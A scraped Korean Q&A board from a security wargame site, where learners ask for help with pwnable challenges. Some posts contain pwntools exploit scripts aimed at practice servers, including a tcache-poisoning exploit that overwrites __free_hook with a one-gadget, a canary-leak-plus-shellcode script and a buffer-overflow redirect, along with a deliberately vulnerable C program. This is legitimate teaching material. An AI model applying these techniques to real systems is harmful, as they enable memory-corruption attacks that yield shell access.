이런 주제는 어때요?
#웹해킹 #시스템해킹 #리버싱 #실습 #뉴비
Q&A
국내 최고 규모의 보안 커뮤니티에서 궁금한 내용을 질문해보세요!
궁금한 것을 질문하세요.
드림핵 강의나 워게임을 연결할 수 있어요.
인기 태그
#System Hacking #Web Hacking #Reverse Engineering
총 539 개의 질문이 있습니다.
Answer
1
0
코드에서 잘못된 것이 뭔지 모르겠습니다
나도 궁금해요 0
from pwn import * p = remote('host3.dreamhack.games', 11109) context.log_level = 'debug' #ret : 0x4013c2 #flag : 0x4012bc a = b'a' * 6 p.sendlineafter(b'Menu: ', a) b = a + b'a' * 2 + int.to_bytes(0x4012bc, 8, 'little') p.sendlineafter(b'Is it cherry?: ', b) p.interactive() 코드를 짜보았는데... 어디가 문제인지 잘 모르겠습니다.. 가르쳐주세요ㅠㅠ
Cherry
#pwnable
9 days ago
Answer
1
0
timeout관련
나도 궁금해요 0
from pwn import * p = remote("host3.dreamhack.games", 15157) #p = process("./tcache_poison") e = ELF("./tcache_poison") libc = ELF("./libc-2.27.so") #full_relro이기때문에 hook_overwrite를 고려해볼수도 있고 #double free bug를 써봐야할듯 stdout = e.symbols['stdout'] p.sendline(b'1') p.sendlineafter(b': ', b'48') p.sendafter(b': ', str('31337')) p.sendlineafter(b't\n', b'2') p.sendlineafter(b't\n',b'4') p.sendafter(b': ',str('AAAAAAAAA')) p.sendlineafter(b't\n',b'2') p.sendlineafter(b't\n', b'1') p.sendlineafter(b': ', b'48') p.sendafter(b': ', p64(stdout)) p.sendlineafter(b't\n', b'1') p.sendlineafter(b': ', b'48') p.sendafter(b': ', b'BBBBBBBB') p.sendlineafter(b't\n', b'1') p.sendlineafter(b': ', b'48') p.sendafter(b': ', b'\x60') p.sendlineafter(b't\n', b'3') p.recvuntil(b'Content: ') stdout = u64(p.recv(6) + b"\x00" * 2) print(hex(stdout)) lb = stdout - libc.symbols["IO_2_1_stdout"] fh = lb + libc.symbols["__free_hook"] print(hex(lb)) print(hex(fh)) oneshot = lb + 0x4f432 p.sendlineafter(b"t\n", b'1') p.sendlineafter(b": ", b'70') p.sendafter(b": ", b"31337") p.sendlineafter(b"t\n", b'2') p.sendlineafter(b"t\n", b'4') p.sendafter(b": ", b'aaaaaaaaa') p.sendlineafter(b"t\n", b'2') p.sendlineafter(b't\n', b'1') p.sendlineafter(b': ', b'70') p.sendafter(b": ", p64(fh)) p.sendlineafter(b't\n', b"1") p.sendlineafter(b": ", b'70') p.sendafter(b': ', b'31337') p.sendlineafter(b't\n', b"1") p.sendlineafter(b": ", b'70') p.sendafter(b': ', p64(oneshot)) p.sendlineafter(b"t\n", b'2') p.interactive() 저의 exploit코드는다음과 같습니다 local에서 실행시 끝까지 잘 진행되고 결과적으로 onegadget의 주소로 이동해서 터미널에서 ls를 치면 sh: 1: 2t.\x91\xd6: not found Allocate Free Print Edit 위와같은 문구가 무한히 반복하며 출력되어 서버에서도 시도했는데 서버는 sendlineafter에서 timeout이 발생하더라구요 Traceback (most recent call last): File "ex.py", line 17, in <module> p.sendafter(b': ',str('AAAAAAAAA')) File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 813, in sendafter res = self.recvuntil(delim, timeout=timeout) 다른분들의 ex코드들을 여러번 바꿔가며 실행해도 서버에서 sendlineafter부분에서 timeout이 발생합니다 원인이 뭘까요?
Tcache Poisoning
#pwnable
11 days ago
Answer
1
1
부르트포스문제인가요??
나도 궁금해요 1
이문제에서 비밀번호 나머지 문자를 알아내기 위해서는 무작위 대입으로 알아내는방법 뿐인건가요?
Dream's Notepad Revenge
#pwnable
16 days ago
Answer
0
0
segmentation fault
나도 궁금해요 0
intel 아이맥 사용 중입니다. 어떤 입력값을 넣어도 hex value를 넣는 과정에서 segmentation fault가 뜹니다. 도와주세요ㅠ
baby-bof
#pwnable
25 days ago
Answer
1
0
풀이 방법 질문
나도 궁금해요 0
darim.tag 까지 뽑아내는 건 성공했는데 그 이후를 어떻게 해야 할지 모르겠습니다... ㅠㅠㅠ
angry_darim
#pwnable
1 month ago
Answer
1
1
쉘은 딴거같은데 결과가 안나오는 것 같아요
나도 궁금해요 1
쉘 딴거같은데 아무것도 안뜨는데 잘못한 걸까요?? image.png 코드입니다
basic_exploitation_000
#pwnable
1 month ago
Answer
1
0
어디에서 bof가 발생하는거에요???
나도 궁금해요 0
// gcc -o baby-bof baby-bof.c -fno-stack-protector -no-pie #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <fcntl.h> #include <signal.h> #include <time.h> void proc_init () { setvbuf (stdin, 0, 2, 0); setvbuf (stdout, 0, 2, 0); setvbuf (stderr, 0, 2, 0); } void win () { char flag[100] = {0,}; int fd; puts ("You mustn't be here! It's a vulnerability!"); fd = open ("./flag", O_RDONLY); read(fd, flag, 0x60); puts(flag); exit(0); } long count; long value; long idx = 0; int main () { char name[16]; // don't care this init function proc_init (); printf ("the main function doesn't call win function (0x%lx)!\n", win); printf ("name: "); scanf ("%15s", name); printf ("GM GA GE GV %s!!\n: ", name); printf ("| addr\t\t| value\t\t|\n"); for (idx = 0; idx < 0x10; idx++) { printf ("| %lx\t| %16lx\t|\n", name + idx 8, *(long)(name + idx*8)); } printf ("hex value: "); scanf ("%lx%c", &value); printf ("integer count: "); scanf ("%d%c", &count); for (idx = 0; idx < count; idx++) { (long)(name+idx*8) = value; } printf ("| addr\t\t| value\t\t|\n"); for (idx = 0; idx < 0x10; idx++) { printf ("| %lx\t| %16lx\t|\n", name + idx 8, *(long)(name + idx*8)); } return 0; } 어떤식으로 bof를 발생시켜야하는지 모르겠어요 ㅠㅠ
baby-bof
#pwnable
1 month ago
Answer
1
0
host3.dreamhack.games에서 잘못된 응답을 전송했습니다. ERR_INVALID_HTTP_RESPONSE
나도 궁금해요 0
제목에 해당하는 오류가 발생하는데... 해결방법 없을까요?
baby-bof
#pwnable
1 month ago
Answer
1
0
SFP에 대해 질문입니다.
나도 궁금해요 0
스택 프레임 포인터라고 하던데 용도가 궁금하고 크기가 0x8이라고 단정할 수 있던 이유도 궁금합니다.
Return Address Overwrite
#pwnable
1 month ago
Answer
1
0
5 coins 라이브러리 오프셋,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
나도 궁금해요 0
__exit_func_lock 얘 주소를 리모트에서 받아왔을 때 맨마지막 1.5비트가 0xfㅁㅁ인데(ㅁㅁ는 강제로 덮힘) 왜 도대체 도커환경에서 했을 때는 0x2ㅂㅂ인가요... 도커환경 내의 로컬에서 캡쳐 (0x2e8) image.png 리모트 보냈을 때에서 캡쳐 (0xfㅁㅁ) image.png 둘이 도대체 왜 다른가여.....ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ 걍 f로 시작하는게 맞겠지...하고 https://libc.rip/걍 브루트 포스로 f00부터 fff까지 날려봤는데 fa8이 나왔거든요 image.png 그런데도 안돼서 성격 드러워져서 걍 라잇업 참고해봤는데 그분은 f28로 되시더라구요...그런데 저는 왜 fa8밖에 안나오는지................ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ 이것때문에 지금 다른거 다 못하궁 있으여,,,, (double free는 다 했고 overwrite 다 가능하게 해놨는데 이 라이브러리 때문에 해결을 못하고있슴다...제발 도와주세요ㅠㅠ)
Heap Basic 1
#pwnable
2 months ago
Answer
5
0
20 coins arch_prctl 활용 방법을 모르겠습니다
나도 궁금해요 0
arch_prctl syscall을 통해 fs/gs 레지스터에 주소 값을 넣을 수 있고, 또 지정된 주소에 fs/gs 레지스터에 저장되어 있는 값을 저장할 수 있다는 점은 알겠는데, 이를 어떤 식으로 활용할 수 있을지 모르겠습니다. arch_prctl로 할 수 있는 동작은 단순히 위의 두 동작이라 스택에 arch_prctl을 통해 값을 쓰고 그 값을 stdout에다 write하는 방식 외에는 arch_prctl의 활용 방법이 떠오르지 않습니다. 그런데 이는 그냥 다른 레지스터들을 갖고서도 할 수 있는 동작이라 arch_prctl syscall의 필요성을 더더욱 느끼질 못하겠습니다. 혹시 arch_prctl에 또 다른 기막힌 활용 방법이 있다면 알려주시면 감사하겠습니다.
Find Candy
#포너블 #pwnable #shellcode #opcode
2 months ago
Answer
1
0
fprintf로 뭘 어떻게 해야할지 모르겠습니다
나도 궁금해요 0
예를들어 aaaaa%11$n나 aaaaa%12$n같이 어떤 %n의 인덱스에 aaw를 하면 터지고 또 fprintf기 때문에 직접적인 출력도 안되서 어떻게 공격을 해야될지 모르겠습니다.
starsb
#pwnable
2 months ago
Answer
2
1
원격 libc 버전 확인법
나도 궁금해요 1
계속 EOF 뜨는 이유가 libc 버전이 원격이랑 로컬이 달라서 그런거 같은데 원격은 버전 어떻게 확인하나요? 로컬 바이너리는 libc.so.6이네요.
rop
#pwnable
2 months ago
Answer
2
1
[*] Got EOF while reading in interactive
나도 궁금해요 1
from pwn import asm,shellcraft,remote, context, u64, p64 p = remote('host3.dreamhack.games', 19436) context.arch = 'amd64' p.recvuntil(b'Address of the buf: ') buf = int(p.recvn(14), 16) print(buf) p.recvuntil(b'Distance between buf and $rbp: ') sfp = p.recvn(2) sfp = int(sfp) bf2canary = sfp-8 print('buf->canary: ', bf2canary) payload=b'A'*(bf2canary+1) p.sendlineafter(b'Input: ', payload) p.recvuntil(payload) canary = u64(b'\x00' + p.recvn(7)) # 0 바이트를 앞에 추가 shellcode = asm(shellcraft.sh()) payload = shellcode.ljust(bf2canary, b'A') + p64(canary) + b'B'*8 + p64(buf) p.recvuntil(b'[2] Overwrite the return address') p.sendlineafter(b'Input: ', payload) p.interactive() 코드에 무슨 문제가 있는지 모르겠습니다 ㅠㅠㅠ
Return to Shellcode
#pwnable
3 months ago
Answer
1
0
힌트부탁드립니다!
나도 궁금해요 0
현재 pie_base와 give로 입력할 수 있는 bss까지 주소를 전부 알아내긴 했으나...결국에 ROP를 수행하려면 libc_base를 알아내야 할 것 같은데, 이 부분이 감이 안잡히네요. 대략적인 시나리오는 bss 영역에 ROP 체인을 구성하고 1 bit flip으로 트리거 하는 거라고 생각했습니다. 힌트주시면 감사하겠습니다.
Operator
#pwnable
3 months ago